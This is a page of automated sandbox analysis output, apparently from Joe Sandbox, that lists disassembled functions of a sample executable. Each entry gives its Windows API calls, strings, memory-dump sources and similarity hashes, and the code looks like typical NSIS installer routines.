                                          Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                          • wsprintfW.USER32 ref: 00404457
                                          • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ItemTextlstrlenwsprintf
                                          • String ID: %u.%u%s%s$@rD
                                          • API String ID: 3540041739-1813061909
                                          • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                          • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                          • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                          • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                          Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                          Download Yara Rule
                                          APIs
                                          • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                          • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                          • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                          • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Char$Next$Prev
                                          • String ID: *?|<>/":
                                          • API String ID: 589700163-165019052
                                          • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                          • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                          • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                          • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                          Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                          • RegCloseKey.ADVAPI32(?), ref: 00401504
                                          • RegCloseKey.ADVAPI32(?), ref: 00401529
                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Close$DeleteEnumOpen
                                          • String ID:
                                          • API String ID: 1912718029-0
                                          • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                          • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                          • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                          • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                          Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?), ref: 004020A3
                                          • GetClientRect.USER32(00000000,?), ref: 004020B0
                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                          • DeleteObject.GDI32(00000000), ref: 004020EE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                          • String ID:
                                          • API String ID: 1849352358-0
                                          • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                          • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                          • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                          • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                          Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: MessageSend$Timeout
                                          • String ID: !
                                          • API String ID: 1777923405-2657877971
                                          • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                          • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                          • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                          • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                          Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          Strings
                                          • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                          • DeleteRegKey: "%s\%s", xrefs: 00402843
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                          • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                          • API String ID: 1697273262-1764544995
                                          • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                          • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                          • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                          • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                          Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • IsWindowVisible.USER32(?), ref: 00404902
                                          • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                            • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Window$CallMessageProcSendVisible
                                          • String ID: $@rD
                                          • API String ID: 3748168415-881980237
                                          • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                          • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                          • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                          • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                          Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                            • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                            • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                          • lstrlenW.KERNEL32 ref: 004026B4
                                          • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                          • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                          • String ID: CopyFiles "%s"->"%s"
                                          • API String ID: 2577523808-3778932970
                                          • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                          • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                          • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                          • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                          Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: lstrcatwsprintf
                                          • String ID: %02x%c$...
                                          • API String ID: 3065427908-1057055748
                                          • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                          • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                          • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                          • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                          Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OleInitialize.OLE32(00000000), ref: 00405057
                                            • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                          • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                          • String ID: Section: "%s"$Skipping section: "%s"
                                          • API String ID: 2266616436-4211696005
                                          • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                          • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                          • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                          • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                          Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDC.USER32(?), ref: 00402100
                                          • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                          • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                          • String ID:
                                          • API String ID: 1599320355-0
                                          • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                          • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                          • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                          • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                          Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                          • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                          • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                          • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: lstrcpyn$CreateFilelstrcmp
                                          • String ID: Version
                                          • API String ID: 512980652-315105994
                                          • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                          • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                          • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                          • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                          Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                          Download Yara Rule
                                          APIs
                                          • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                          • GetTickCount.KERNEL32 ref: 00403303
                                          • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                          • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                          • String ID:
                                          • API String ID: 2102729457-0
                                          • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                          • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                          • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                          • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                          Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                          • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                          • String ID:
                                          • API String ID: 2883127279-0
                                          • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                          • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                          • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                          • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                          Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                          • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: PrivateProfileStringlstrcmp
                                          • String ID: !N~
                                          • API String ID: 623250636-529124213
